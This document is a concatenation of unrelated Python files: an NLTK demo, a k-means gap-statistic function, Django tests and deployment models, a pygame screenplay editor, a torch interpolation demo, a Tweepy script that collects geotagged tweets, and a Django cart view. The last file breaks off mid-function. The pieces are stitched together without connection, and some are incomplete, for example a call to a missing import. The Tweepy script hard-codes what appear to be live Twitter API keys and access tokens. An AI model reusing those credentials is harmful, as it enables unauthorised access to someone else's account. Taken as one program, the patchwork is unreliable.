# Demo text containing abbreviations ("Mr.") that naive splitting would break on.
example_text = "Hello Mr. Smith, how are you doing today? The weather is great and Python is awesome. The sky is pinkish-blue. You should not eat cardboard."
##print(sent_tokenize(example_text))
##
##print(word_tokenize(example_text))
# Print each word token on its own line.
for i in word_tokenize(example_text):
    print(i)
|
### Gap Statistics Function
### Input: X = read_csv()
### Outputs: ks, Wks, Wkbs, sk
### Wks and Wkbs are logarithmic
from numpy import genfromtxt
import numpy as np
import random
from numpy import zeros
def bounding_box(X):
    """Return ((xmin, xmax), (ymin, ymax)) spanning the 2-D points in X."""
    xs = [point[0] for point in X]
    ys = [point[1] for point in X]
    return (min(xs), max(xs)), (min(ys), max(ys))
def has_converged(mu, oldmu):
    """True when both center lists contain the same points (order-insensitive)."""
    current = {tuple(center) for center in mu}
    previous = {tuple(center) for center in oldmu}
    return current == previous
def cluster_points(X, mu):
    """Group the points of X by the index of their nearest center in mu.

    Returns a dict mapping center index -> list of assigned points; indices
    with no assigned points are absent from the dict.
    """
    clusters = {}
    for point in X:
        distances = [(idx, np.linalg.norm(point - center))
                     for idx, center in enumerate(mu)]
        nearest = min(distances, key=lambda pair: pair[1])[0]
        clusters.setdefault(nearest, []).append(point)
    return clusters
def find_centers(X, K):
    """
    Lloyd's k-means: cluster X into K groups.

    Parameters
    ----------
    X : sequence of points (must be usable with random.sample)
    K : int, number of clusters

    Returns
    -------
    (mu, clusters) : the final centers and the assignment dict for them.
    """
    # Initialize to K random centers
    oldmu = random.sample(X, K)
    mu = random.sample(X, K)
    # Bug fix: compute an initial assignment so `clusters` is always bound —
    # the original raised UnboundLocalError at the return when the two random
    # initializations happened to be equal and the loop never ran.
    clusters = cluster_points(X, mu)
    while not has_converged(mu, oldmu):
        oldmu = mu
        # Assign all points in X to clusters
        clusters = cluster_points(X, mu)
        # Reevaluate centers
        mu = reevaluate_centers(oldmu, clusters)
    return(mu, clusters)
def reevaluate_centers(mu, clusters):
    """Return new centers: the per-cluster mean, in sorted key order.

    The *mu* argument is unused but kept for call-site compatibility.
    """
    return [np.mean(clusters[key], axis=0) for key in sorted(clusters.keys())]
def Wk(mu, clusters):
    """Pooled within-cluster dispersion used by the gap statistic.

    NOTE: each squared distance is divided by 2*len(point) — i.e. twice the
    point's dimensionality — exactly as in the original implementation.
    """
    total = 0.0
    for idx in range(len(mu)):
        for point in clusters[idx]:
            total += np.linalg.norm(mu[idx] - point) ** 2 / (2 * len(point))
    return total
def gap_statistic(X):
    """
    Compute the gap statistic (Tibshirani, Walther & Hastie, 2001) for
    k = 1..9 clusters of the 2-D point set X.

    Returns
    -------
    (ks, Wks, Wkbs, sk)
        ks   : range of cluster counts tried.
        Wks  : log within-cluster dispersion of X for each k.
        Wkbs : mean log dispersion over B uniform reference datasets per k.
        sk   : std-dev of the reference dispersions, scaled by sqrt(1 + 1/B).
    """
    (xmin,xmax), (ymin,ymax) = bounding_box(X)
    # Dispersion for real distribution
    ks = range(1,10)
    Wks = zeros(len(ks))
    Wkbs = zeros(len(ks))
    sk = zeros(len(ks))
    for indk, k in enumerate(ks):
        mu, clusters = find_centers(X,k)
        Wks[indk] = np.log(Wk(mu, clusters))
        # Create B reference datasets
        B = 10
        BWkbs = zeros(B)
        for i in range(B):
            # Uniform reference sample drawn from X's bounding box.
            Xb = []
            for n in range(len(X)):
                Xb.append([random.uniform(xmin,xmax),
                           random.uniform(ymin,ymax)])
            Xb = np.array(Xb)
            mu, clusters = find_centers(Xb,k)
            BWkbs[i] = np.log(Wk(mu, clusters))
        Wkbs[indk] = sum(BWkbs)/B
        sk[indk] = np.sqrt(sum((BWkbs-Wkbs[indk])**2)/B)
    # NOTE(review): under Python 2 the 1/B below is integer division (== 0),
    # so the correction factor degenerates to 1; it is correct on Python 3.
    sk = sk*np.sqrt(1+1/B)
    return(ks, Wks, Wkbs, sk)
|
from django.test import TestCase
from django.contrib.auth.models import User
from .models import User as UserModel, AccountDetail, Transaction
from rest_framework.test import APIClient
from rest_framework import status
from django.urls import reverse
from faker import Faker
class ModelTestCase(TestCase):
    """Class defines test suite for our model"""

    def setUp(self):
        """Build an unsaved UserModel instance backed by a fresh auth User."""
        self.fake = Faker()
        user = User.objects.create(username=self.fake.user_name())
        self.first_name = self.fake.first_name()
        self.last_name = self.fake.last_name()
        self.email = self.fake.email()
        # Deliberately not saved here: tests call .save() themselves so they
        # can observe the row-count change.
        self.user_data = UserModel(
            owner=user,
            first_name=self.first_name,
            last_name=self.last_name,
            email=self.email,
        )

    def test_model_can_create_user_table_in_db(self):
        """Saving the prepared instance must increase the row count."""
        old_count = UserModel.objects.count()
        self.user_data.save()
        new_count = UserModel.objects.count()
        self.assertNotEqual(old_count, new_count)

    def test_model_can_create_account_details_table(self):
        # TODO: AccountDetail model test not implemented yet.
        pass

    def test_model_can_create__table_in_db(self):
        # TODO: Transaction model test not implemented yet.
        pass
class ServicesTestCase(TestCase):
    """Test business logic here."""
    # TODO: no service-layer tests implemented yet.
    pass
class ViewTestCase(TestCase):
    """Integration tests for the user API endpoints."""

    def setUp(self):
        """Create an authenticated client and POST an initial user."""
        self.fake = Faker()
        user = User.objects.create(username=self.fake.user_name())
        self.client = APIClient()
        self.client.force_authenticate(user=user)
        self.user_data = {
            'owner': user.id,
            'first_name': self.fake.first_name(),
            'last_name': self.fake.last_name(),
            'email': self.fake.email(),
        }
        self.response = self.client.post(
            reverse('createuser'),
            self.user_data,
            format="json"
        )

    def test_api_can_create_a_user(self):
        self.assertEqual(self.response.status_code, status.HTTP_201_CREATED)

    def test_authorization_is_enforced(self):
        """An unauthenticated client must receive 401."""
        a_client = APIClient()
        # Bug fix: APIClient.get() takes a URL, not a view name — the original
        # passed the literal string 'profile' (plus a meaningless ``kwargs``
        # argument that became query data), so the request never reached the
        # profile route. Build the URL with reverse() as the other tests do.
        a_response = a_client.get(
            reverse('profile', kwargs={'pk': 5}),
            format="json",
        )
        self.assertEqual(a_response.status_code, status.HTTP_401_UNAUTHORIZED)

    def test_api_can_get_user_details(self):
        # Bug fix: fetch the user created in setUp() instead of assuming a row
        # with hard-coded primary key 5 exists, and use reverse() for the URL
        # (the original passed the route name as the path).
        user = UserModel.objects.get()
        response = self.client.get(
            reverse('profile', kwargs={'pk': user.id}),
            format="json",
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertContains(response, user)

    def test_api_can_update_user_email(self):
        user = UserModel.objects.get()
        change_email = {'email': 'hello@test.com'}
        response = self.client.put(
            reverse('profile', kwargs={'pk': user.id}),
            change_email,
            format="json",
        )
        self.assertEqual(response.status_code, status.HTTP_200_OK)

    def test_api_can_delete_user(self):
        # TODO: DELETE endpoint coverage not implemented yet.
        pass
|
from django.db import models
class Rsa(models.Model):
    """SSH private key used to reach deployment servers."""
    status_choices = (
        (1, '启用'),
        (2, '停用'),
    )
    # 1 = enabled, 2 = disabled
    status = models.PositiveSmallIntegerField(verbose_name='状态', choices=status_choices)
    user = models.CharField(verbose_name='用户', max_length=32, default='root')
    private_key = models.TextField(verbose_name='私钥')
class Server(models.Model):
    """Host table.

    For example: all of the company's host machines.
    """
    hostname = models.CharField(verbose_name='主机名', max_length=32)

    def __str__(self):
        return self.hostname
class Project(models.Model):
    """A deployable project."""
    title = models.CharField(verbose_name='项目名', max_length=32)
    repo = models.CharField(verbose_name='git仓库地址', max_length=128)  # ['http', 'https', 'ftp', 'ftps']

    def __str__(self):
        return self.title
class ProjectEnv(models.Model):
    """A project's deployment environment (test or production)."""
    # NOTE(review): ForeignKey without on_delete — this code targets
    # Django < 2.0; on_delete becomes mandatory from 2.0 on.
    project = models.ForeignKey(verbose_name='项目', to='Project')
    env_choices = (
        ('test', '测试'),
        ('prod', '正式')
    )
    env = models.CharField(verbose_name='环境', choices=env_choices, max_length=32)
    path = models.CharField(verbose_name='线上部署路径', max_length=128)
    # Hosts this environment deploys to.
    servers = models.ManyToManyField(verbose_name='服务器', to='Server')

    def __str__(self):
        return "%s(%s)" % (self.project.title, self.get_env_display())
class DeployTask(models.Model):
    """A single release task for one project environment."""
    summary = models.CharField(verbose_name='描述', max_length=64)
    uid = models.CharField(verbose_name='任务ID', max_length=64, help_text="任务ID格式为:项目-版本-时间,例如 cmdb-v1-201911012359.zip")
    status_choices = (
        (1, '待发布'),
        (2, '发布中'),
        (3, '成功'),
        (4, '失败'),
    )
    # 1 pending, 2 in progress, 3 success, 4 failure
    status = models.PositiveSmallIntegerField(verbose_name='状态', choices=status_choices, default=1)
    env = models.ForeignKey(verbose_name='环境', to='ProjectEnv')
    # Production releases deploy a git tag
    tag = models.CharField(verbose_name='版本', max_length=32, null=True, blank=True)
    # Test releases deploy a branch + commit
    branch = models.CharField(verbose_name='分支', max_length=32, null=True, blank=True)
    commit = models.CharField(verbose_name='提交记录', max_length=40, null=True, blank=True)
    deploy_type_choices = (
        (1, '全量主机发布'),
        (2, '自定义主机发布'),
    )
    # 1 = deploy to all hosts of the env, 2 = deploy to a custom host subset
    deploy_type = models.PositiveSmallIntegerField(verbose_name='发布类型', choices=deploy_type_choices, default=1)
    # Query (reference example of a custom-host M2M via a through table):
    """
    xx = models.ManyToManyField(verbose_name='自定义主机',
                                to='Server',
                                through='DeployServer',
                                through_fields=('deploy', 'server'))
    """
    # Hook scripts run around the download and deploy phases.
    before_download_script = models.TextField(verbose_name='下载前脚本', null=True, blank=True)
    after_download_script = models.TextField(verbose_name='下载后脚本', null=True, blank=True)
    before_deploy_script = models.TextField(verbose_name='发布前脚本', null=True, blank=True)
    after_deploy_script = models.TextField(verbose_name='发布后脚本', null=True, blank=True)
class HookScript(models.Model):
    """
    Reusable hook-script templates (run before/after download/deploy).
    """
    title = models.CharField(verbose_name='标题', max_length=32)
    hook_type_choices = (
        (2, '下载前'),
        (4, '下载后'),
        (7, '发布前'),
        (9, '发布后'),
    )
    # 2 before download, 4 after download, 7 before deploy, 9 after deploy
    hook_type = models.IntegerField(verbose_name='钩子类型', choices=hook_type_choices)
    script = models.TextField(verbose_name='脚本内容')
class DeployServer(models.Model):
    """
    Per-server release record for one deploy task.
    """
    deploy = models.ForeignKey(verbose_name='发布任务', to='DeployTask')
    server = models.ForeignKey(verbose_name='服务器', to='Server')
    status_choices = (
        (1, '待发布'),
        (2, '发布中'),
        (3, '失败'),
        (4, '成功'),
    )
    # NOTE(review): codes 3 (failure) and 4 (success) are swapped relative to
    # DeployTask.status_choices — confirm this is intentional.
    status = models.PositiveSmallIntegerField(verbose_name='状态', choices=status_choices, default=1)
class Diagram(models.Model):
    """Release flow-chart node: one per step, colored by execution status."""
    task = models.ForeignKey(verbose_name='发布任务', to='DeployTask')
    text = models.CharField(verbose_name='文本', max_length=32)
    status_choices = (
        ('gray', '待执行'),
        ('green', '成功'),
        ('red', '失败'),
    )
    # gray = pending, green = success, red = failure
    status = models.CharField(verbose_name='状态', max_length=32, choices=status_choices, default='gray')
    # Self-referential FK: nodes form a tree.
    parent = models.ForeignKey(verbose_name='父节点', to='self', null=True, blank=True)
    deploy_record = models.ForeignKey(verbose_name='服务器发布记录', to='DeployServer', null=True, blank=True)
    log = models.TextField(verbose_name='日志', null=True, blank=True)
|
import time
import os
import yaml
import pygame
from pygame.locals import *
import owr_screenplay
import owr_behavior
def HandleScreenplayViewportSelectInput(self, game):
  """Extending out Core's input handler: handles clicks while the editor is in
  "select something in the viewport" mode (game.ui_select_viewport is set)."""
  # If they hit ESC, clear selection
  if self.input.IsKeyDown(K_ESCAPE, once=True):
    game.ui_select_viewport = None
    print 'Quit Select Viewport'
  rect = pygame.Rect([0, 0], game.core.data['window']['viewport size'])
  # mouseButtons[0] == ticks means the left button was pressed this frame.
  if rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] == self.input.ticks:
    print 'Viewport Select: %s: %s' % (str(self.input.mousePos), game.ui_select_viewport)
    # If we are selection position for a Actor's data keys
    if game.ui_select_viewport['action'] == 'select position':
      current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
      actor = game.ui_select_viewport['data'][0]
      actor_data = current_state['actors'][actor]
      key = game.ui_select_viewport['data'][1]
      #TODO(g): Convert to World Coordinates, not just Screen Coords, this is WRONG!
      actor_data[key] = list(self.input.mousePos)
      # Clear this selection - Leads to double hitting ESC which cancels stuff
      game.ui_select_viewport = None
      # Regenerate Timeline
      owr_screenplay.RegenerateTimeline(game)
      print 'Selected Actor Pos: %s: %s: %s' % (actor, key, actor_data[key])
    # Else, if a Goal Key that needs Viewport Select,
    elif game.ui_select_viewport['action'] in ('add goal key', 'edit goal key'):
      # Change the Actor data
      current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
      actor_data = current_state['actors'][game.ui_select_viewport['actor']]
      # Set the goal key value to the Viewport Pos
      actor_data['goal'][game.ui_select_viewport['goal_number']][game.ui_select_viewport['key']] = list(self.input.mousePos)
      # If this is a primary key, set all the default keys if they dont already exist
      if game.ui_select_viewport['key'] in owr_behavior.GOAL_KEYS:
        if game.ui_select_viewport['key'] in owr_behavior.GOAL_DEFAULTS:
          for (goal_key, default_value) in owr_behavior.GOAL_DEFAULTS[game.ui_select_viewport['key']].items():
            # If we dont already have this goal key, set the default value
            if goal_key not in actor_data['goal'][game.ui_select_viewport['goal_number']]:
              actor_data['goal'][game.ui_select_viewport['goal_number']][goal_key] = default_value
      # Clear the Viewport and popup UI - We did everything here
      game.ui_select_viewport = None
      game.ui_popup_data = None
      # Regenerate Timeline
      owr_screenplay.RegenerateTimeline(game)
    # Else, two-click camera placement: first click sets one corner,
    # second click sets the other.
    elif game.ui_select_viewport['action'] == 'position camera':
      # # Render any Camera Rects, if we arent using the camera view
      # if state['cameras'] and not game.use_camera_view:
      #   camera = state['cameras'][0]
      # Populate first position
      if game.ui_select_viewport['first'] == None:
        game.ui_select_viewport['first'] = list(self.input.mousePos)
      # Populate second position and save
      elif game.ui_select_viewport['second'] == None:
        game.ui_select_viewport['second'] = list(self.input.mousePos)
        # Determine the rect position and size
def HandleScreenplayPopupInput(self, game):
  """Extending out Core's input handler: routes clicks while a popup
  (game.ui_popup_data) is open."""
  # If they hit ESC, clear the popup
  if self.input.IsKeyDown(K_ESCAPE, once=True):
    game.ui_popup_data = None
    print 'Quit Select Viewport'
  # If we have Input Targets (UI)
  if hasattr(game, 'input_targets'):
    for input_target in game.input_targets:
      rect = pygame.Rect(input_target['pos'], input_target['size'])
      # mouseButtons[0] == ticks means the left button was pressed this frame.
      if rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] == self.input.ticks:
        print '%s: %s' % (input_target['action'], input_target['data'])
        # Else, if we are trying to edit a goal key: the user picked a key,
        # so update the popup to prompt for that key's value next.
        if input_target['action'] == 'add goal key:select:key':
          game.ui_popup_data['key'] = input_target['data']
          game.ui_popup_data['prompt'] = 'Enter Key Value: %s' % game.ui_popup_data['key']
def HandleScreenplayInput(self, game):
  """Extending out Core's input handler: top-level editor input for the
  screenplay view — UI button clicks, timeline scrubbing, save/quit."""
  MOVE_ONCE = False  # NOTE(review): never read below — appears to be dead.
  # Clear any hover over, as we dont know of any so far
  game.ui_hover_over_button = None
  # If we have Input Targets (UI)
  if hasattr(game, 'input_targets'):
    for input_target in game.input_targets:
      rect = pygame.Rect(input_target['pos'], input_target['size'])
      # Hovered over, but not clicked
      if rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] != self.input.ticks:
        print 'Hover over: %s' % input_target['name']
        game.ui_hover_over_button = input_target['name']
      # Else, if clicked button
      elif rect.collidepoint(self.input.mousePos) and self.input.mouseButtons[0] == self.input.ticks:
        print '%s: %s' % (input_target['action'], input_target['data'])
        # If we are selecting an actor, toggle
        if input_target['action'] == 'select actor':
          # If we dont have this yet, add it
          if input_target['name'] not in game.ui_selected_actors:
            game.ui_selected_actors.append(input_target['name'])
          else:
            game.ui_selected_actors.remove(input_target['name'])
        # Else, if we are trying to delete an actor
        elif input_target['action'] == 'delete actor':
          current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
          del current_state['actors'][input_target['data']]
          # Regenerate Timeline
          owr_screenplay.RegenerateTimeline(game)
        # Else, if we are trying to delete a goal key
        elif input_target['action'] == 'delete goal key':
          current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
          actor = input_target['data'][0]
          goal_number = input_target['data'][1]
          goal_key = input_target['data'][2]
          del current_state['actors'][actor]['goal'][goal_number][goal_key]
          # Regenerate Timeline
          owr_screenplay.RegenerateTimeline(game)
        # Else, if we are trying to delete a goal
        elif input_target['action'] == 'delete goal':
          current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
          actor = input_target['data'][0]
          goal_number = input_target['data'][1]
          del current_state['actors'][actor]['goal'][goal_number]
          # Regenerate Timeline
          owr_screenplay.RegenerateTimeline(game)
        # Else, if we are trying to add a goal key
        elif input_target['action'] == 'add goal key':
          # Clear the string, so we can get it
          game.core.input.ClearAutoString()
          # Create UI Popup information, to create a popup input display
          actor = input_target['data'][0]
          goal_number = input_target['data'][1]
          game.ui_popup_data = {'action':input_target['action'], 'prompt':'Select Goal:', 'actor':actor, 'goal_number':goal_number, 'key':None, 'value':None}
        # Else, if we are trying to add a goal
        elif input_target['action'] == 'add goal':
          # Clear the string, so we can get it
          game.core.input.ClearAutoString()
          # Add a new goal - No need to RegenerateTime() because it doesnt do anything yet
          current_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed)
          actor = input_target['data']
          # Insert empty goal dict
          current_state['actors'][actor]['goal'].append({})
        # Else, if we are trying to edit a goal key
        elif input_target['action'] == 'edit goal key':
          # Clear the string, so we can get it
          game.core.input.ClearAutoString()
          # Set the auto-string to the current value
          print 'Setting initial string: %s' % str(input_target['data'][3])
          game.core.input.autoKeyString = str(input_target['data'][3])
          prompt = 'Enter Key Value: %s' % input_target['data'][2]
          # Create UI Popup information, to create a popup input display
          game.ui_popup_data = {'action':input_target['action'], 'prompt':prompt, 'actor':input_target['data'][0], 'goal_number':input_target['data'][1], 'key':input_target['data'][2], 'value':None}
          # # Regenerate Timeline
          # owr_screenplay.RegenerateTimeline(game)
        # Else, if we are trying to edit a goal key
        elif input_target['action'] == 'select position':
          print 'Select Viewport Position'
          # Set the UI Select Viewport data, so that this input mode enages
          game.ui_select_viewport = input_target
  # If there is a player playing, let them process the input
  if game.player:
    input_text = game.player.ProcessInput(self.input)
    self.input_text = input_text #TODO(g): This is in the wrong place: startup code
    #Log('Input: %s' % input_text)
  # Get information
  if self.input.IsKeyDown(K_i, once=True):
    #Log('Game:\n%s' % self.game)
    Log('Player:\n%s' % self.game.player)
  # If no Shift or Ctrl is being pressed
  if not ((self.input.IsKeyDown(K_LSHIFT) or self.input.IsKeyDown(K_RSHIFT)) or self.input.IsKeyDown(K_LCTRL)):
    # If they hit 1
    if self.input.IsKeyDown(K_1, once=True):
      game.use_camera_view = not game.use_camera_view
      print 'Using Camera View: %s' % game.use_camera_view
    # If they hit LEFT
    if self.input.IsKeyDown(K_LEFT):
      game.time_elapsed -= 0.2
      if game.time_elapsed < 0.0:
        game.time_elapsed = 0.0
      print 'BACK: %0.1f seconds since start' % (game.time_elapsed)
    # If they hit RIGHT
    if self.input.IsKeyDown(K_RIGHT):
      game.time_elapsed += 0.2
      #TODO(g):HARDCODED: Remove hard coded max time, it should be based on timeline total length, which can be slid out dynamically
      #TODO(g): Add shorten/length timeline stuff. Dont bother deleting any scenes or goals, just crop as necessary and let deleting them be specific
      if game.time_elapsed >= 300.0:
        game.time_elapsed = 299.9
      print 'FWRD: %0.1f seconds since start' % (game.time_elapsed)
    # UP/DOWN scrub in coarser 2-second steps.
    if self.input.IsKeyDown(K_UP):
      game.time_elapsed -= 2.0
      if game.time_elapsed < 0.0:
        game.time_elapsed = 0.0
      print 'BACK: %0.1f seconds since start' % (game.time_elapsed)
    if self.input.IsKeyDown(K_DOWN):
      game.time_elapsed += 2.0
      if game.time_elapsed >= 300.0:
        game.time_elapsed = 299.9
      print 'FWRD: %0.1f seconds since start' % (game.time_elapsed)
    # Select Next Actor
    if self.input.IsKeyDown(K_TAB, once=True):
      selected_actor = owr_screenplay.SelectNextActor(game)
      print 'TAB: Selected Actor: %s' % (selected_actor)
    # Adjust how much to skip between Future/Past frames
    if self.input.IsKeyDown(K_LEFTBRACKET):
      game.future_past_skip -= 1
      if game.future_past_skip < 1:
        game.future_past_skip = 1
      print 'Skip adjusted: %s' % game.future_past_skip
    if self.input.IsKeyDown(K_RIGHTBRACKET):
      game.future_past_skip += 1
      if game.future_past_skip > 50:
        game.future_past_skip = 50
      print 'Skip adjusted: %s' % game.future_past_skip
  # If only Left Shift is being held down
  if (self.input.IsKeyDown(K_LSHIFT) or self.input.IsKeyDown(K_RSHIFT)) and not self.input.IsKeyDown(K_LCTRL):
    # Select Previous Actor
    if self.input.IsKeyDown(K_TAB, once=True):
      selected_actor = owr_screenplay.SelectNextActor(game, reverse=True)
      print 'TAB: Selected Actor: %s' % (selected_actor)
    # If they hit LEFT
    if self.input.IsKeyDown(K_LEFT, once=True):
      previous_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed, get_previous_state=True)
      game.time_elapsed = previous_state['at']
      print 'PREVIOUS CHANGE POINT: %0.1f seconds since start' % (game.time_elapsed)
    # If they hit RIGHT
    if self.input.IsKeyDown(K_RIGHT, once=True):
      next_state = owr_screenplay.TimelineState(game, game.data['screenplay_data'], game.time_elapsed, get_next_state=True)
      game.time_elapsed = next_state['at']
      print 'NEXT CHANGE POINT: %0.1f seconds since start' % (game.time_elapsed)
    # If they hit RIGHT - Move only 1 frame worth of time
    if self.input.IsKeyDown(K_DOWN, once=True):
      game.time_elapsed += (1.0 / float(owr_screenplay.FRAMES_PER_SECOND))
      #TODO(g):HARDCODED: Remove hard coded max time, it should be based on timeline total length, which can be slid out dynamically
      #TODO(g): Add shorten/length timeline stuff. Dont bother deleting any scenes or goals, just crop as necessary and let deleting them be specific
      if game.time_elapsed >= 300.0:
        game.time_elapsed = 299.9
      print 'FWRD STEP: %0.1f seconds since start' % (game.time_elapsed)
    # If they hit LEFT - Move only 1 frame worth of time
    if self.input.IsKeyDown(K_UP, once=True):
      game.time_elapsed -= (1.0 / float(owr_screenplay.FRAMES_PER_SECOND))
      #TODO(g):HARDCODED: Remove hard coded max time, it should be based on timeline total length, which can be slid out dynamically
      #TODO(g): Add shorten/length timeline stuff. Dont bother deleting any scenes or goals, just crop as necessary and let deleting them be specific
      if game.time_elapsed < 0.0:
        game.time_elapsed = 0.0
      print 'REVERSE STEP: %0.1f seconds since start' % (game.time_elapsed)
    # Adjust how much to skip between Future frames
    if self.input.IsKeyDown(K_LEFTBRACKET, once=True):
      game.future_frames -= 1
      if game.future_frames < 0:
        game.future_frames = 0
      print 'Future Frames adjusted: %s' % game.future_frames
    if self.input.IsKeyDown(K_RIGHTBRACKET, once=True):
      game.future_frames += 1
      if game.future_frames > 20:
        game.future_frames = 20
      print 'Future Frames adjusted: %s' % game.future_frames
  # If only Left CTRL to being held down
  if self.input.IsKeyDown(K_LCTRL) and not self.input.IsKeyDown(K_LSHIFT):
    # Adjust how much to skip between Past frames
    if self.input.IsKeyDown(K_LEFTBRACKET, once=True):
      game.past_frames -= 1
      if game.past_frames < 0:
        game.past_frames = 0
      print 'Past Frames adjusted: %s' % game.past_frames
    if self.input.IsKeyDown(K_RIGHTBRACKET, once=True):
      game.past_frames += 1
      if game.past_frames > 20:
        game.past_frames = 20
      print 'Past Frames adjusted: %s' % game.past_frames
  # If we're told to Save the screenplay
  if self.input.IsKeyDown(K_s, once=True):
    owr_screenplay.SaveScreenplay(game)
  # If we're told to Save the screenplay
  if self.input.IsKeyDown(K_m, once=True):
    #owr_screenplay.SaveScreenplay(game)
    game.ui_select_viewport = {'action':'position camera', 'first':None, 'second':None}
  # Add an Actor
  if self.input.IsKeyDown(K_a, once=True):
    print 'Add an Actor'
    # Clear the string, so we can get it
    game.core.input.ClearAutoString()
    # Create UI Popup information, to create a popup input display
    game.ui_popup_data = {'action':'add actor', 'prompt':'Enter Name:', 'name':None}
  # Start and Stop playing
  if self.input.IsKeyDown(K_SPACE, once=True):
    game.playing = not game.playing
    # Reset time, so we dont jump ahead
    game.time_previous = time.time()
    game.time_current = time.time()
  # If they hit ESC
  if self.input.IsKeyDown(K_ESCAPE, once=True):
    # Save the Screenplay before we quit
    #TODO(g): Check if it changed, make a ".lastquit" version of it, and load that. Allow loading of
    #   previous versions and do versioning in a backup directory. Not a lot of data, worth having
    #   continuous Undo log of saved states...
    owr_screenplay.SaveScreenplay(game)
    # Save the UI state, so we can resume editing in the same place we left off on restart
    owr_screenplay.SaveUIState(game)
    game.quitting = True
|
# coding: utf-8
import torch
import torch_interpolations
import numpy as np
import matplotlib.pyplot as plt
# Demo: compare torch_interpolations' RegularGridInterpolator against the
# analytic function it was sampled from.
# 1-D grid coordinates for both axes (15 samples on [-0.5, 2.5) step 0.2).
points = [torch.arange(-.5, 2.5, .2) * 1., torch.arange(-.5, 2.5, .2) * 1.]
# Sample a smooth 2-D test function on the grid (outer-product indexing).
values = torch.sin(points[0])[:, None] + 2 * torch.cos(points[1])[None, :] + torch.sin(5 * points[0][:, None] @ points[1][None, :])
gi = torch_interpolations.RegularGridInterpolator(points, values)
# Dense query grid (finer than the sample grid) flattened to coordinate lists.
X, Y = np.meshgrid(np.arange(-.5, 2.5, .02), np.arange(-.5, 2.5, .01))
points_to_interp = [torch.from_numpy(
    X.flatten()).float(), torch.from_numpy(Y.flatten()).float()]
fx = gi(points_to_interp)
print(fx)
# Left: ground truth evaluated on the dense grid; right: interpolated values.
# NOTE(review): the "True" panel uses sin(5*X*Y), while the sampled surface
# used an outer product of the axis vectors - confirm these are meant to match.
fig, axes = plt.subplots(1, 2)
axes[0].imshow(np.sin(X) + 2 * np.cos(Y) + np.sin(5 * X * Y))
axes[0].set_title("True")
axes[1].imshow(fx.numpy().reshape(X.shape))
axes[1].set_title("Interpolated")
plt.show() |
# Created by @RGuitar96 using @sethoscope heatmap and Tweepy library for the Twitter API
# Dependencies:
# pip install tweepy
# pip install textblob
import json
from tweepy import Stream
from tweepy import OAuthHandler
from tweepy.streaming import StreamListener
# SECURITY: real Twitter API credentials are hard-coded here. They should be
# revoked and loaded from environment variables or a config file kept out of
# version control.
ckey = 'HS38Z8lPuAiaOcogMVybFBtzR'
csecret = 'fqNEDpXxoIoWUY4e7vDf3F3SYhm8qFNmqZiZOL5W77enWBcc1v'
atoken = '540079107-a6HSC1Ipm9LhagMSTiQyDpoEQjuq8ZG420dOUMC5'
asecret = 'zd1T13XKQ7DhVuEqBx540Y1SGnbkfu0NHdiWC1L16NOHY'
# First pair (longitude, latitude) indicates the lower left or southwest corner
# Second pair indicates the upper right or northeast corner
# alcalá de henares
# region = [-3.406054, 40.462477, -3.335267, 40.521660]
# comunidad de madrid
region = [-4.650673, 39.859128, -2.943299, 41.226270]
class listener(StreamListener):
    """Tweepy stream listener that appends geotagged tweets to tweets.txt and
    their averaged coordinates to tweets_coordinates.txt."""

    def on_data(self, data):
        """Handle one raw stream message (JSON string); always return True to
        keep the stream alive."""
        try:
            decoded = json.loads(data)
        except Exception as e:
            print(e)
            return True
        # BUG FIX: the original indexed decoded['place']['bounding_box']
        # unconditionally and used lat/lon/coord that were only assigned in
        # the has-coordinates branch (NameError otherwise). Tweets without
        # usable geo data are now simply skipped.
        place = decoded.get('place')
        if not place or not place.get('bounding_box'):
            return True
        location = place['bounding_box'].get('coordinates')
        if not location:
            return True
        # Average the bounding-box corners into a single (lat, lon) point.
        corners = location[0]
        lon = sum(corner[0] for corner in corners) / len(corners)
        lat = sum(corner[1] for corner in corners) / len(corners)
        # Keep only tweets inside the configured region (module-level global).
        if region[1] < lat < region[3] and region[0] < lon < region[2]:
            text = decoded['text'].replace('\n', ' ').encode('utf-8')
            user = '@' + decoded.get('user').get('screen_name')
            created = decoded.get('created_at')
            tweet = '%s|%s|%s|%s\n' % (user, [lat, lon], created, text)
            # BUG FIX: files were left open when the region test failed;
            # open them only when writing, and close them deterministically.
            with open('tweets.txt', 'a') as tweet_file:
                tweet_file.write(tweet)
            with open('tweets_coordinates.txt', 'a') as coord_file:
                coord_file.write('%s %s\n' % (lat, lon))
        return True

    def on_error(self, status):
        """Print stream errors (e.g. HTTP 420 rate limiting)."""
        print(status)
if __name__ == '__main__':
    # Authenticate with the module-level credentials and stream tweets
    # geotagged inside `region` into the listener above.
    print('Stream has began...')
    auth = OAuthHandler(ckey, csecret)
    auth.set_access_token(atoken, asecret)
    twitterStream = Stream(auth, listener())
    # Blocks forever; interrupt with Ctrl-C when enough tweets are collected.
    twitterStream.filter(locations=region)
# When you are done capturing tweets, you can generate a heatmap
# as shown below. You can adjust the parameters as you prefer.
#
# python heatmap.py -o output.png --osm -W 2000
#    -v -e 39.8591,-4.6506,41.2262,-2.9432
#    -d 0.6 -r 60 http://b.tile.stamen.com/toner tweets_coordinates.txt
|
from django.shortcuts import render, redirect
from django.views.generic import CreateView
from django.urls.base import reverse_lazy
from django.contrib.messages import success, error
# Create your views here.
from account.models import Customer
from .models import OrderItem, Order
from .forms import CheckoutForm
from .signals import send_form
# def deletefromcart(request, id):
# cartitem = OrderItem.objects.get(id=id)
# cartitem.delete()
# return redirect('cart')
def cart(request):
    """Render the cart page for the customer identified by the 'device' cookie.

    Looks up (or creates) the customer's open order and collects the main
    image URL for each order item. Debug prints from the original were
    removed.
    """
    show_order_items = None
    device = request.COOKIES.get('device')
    customer, created = Customer.objects.get_or_create(device=device)
    order, created = Order.objects.get_or_create(customer=customer, complete=False)
    items = order.orderitem_set.all()
    imgs = {}
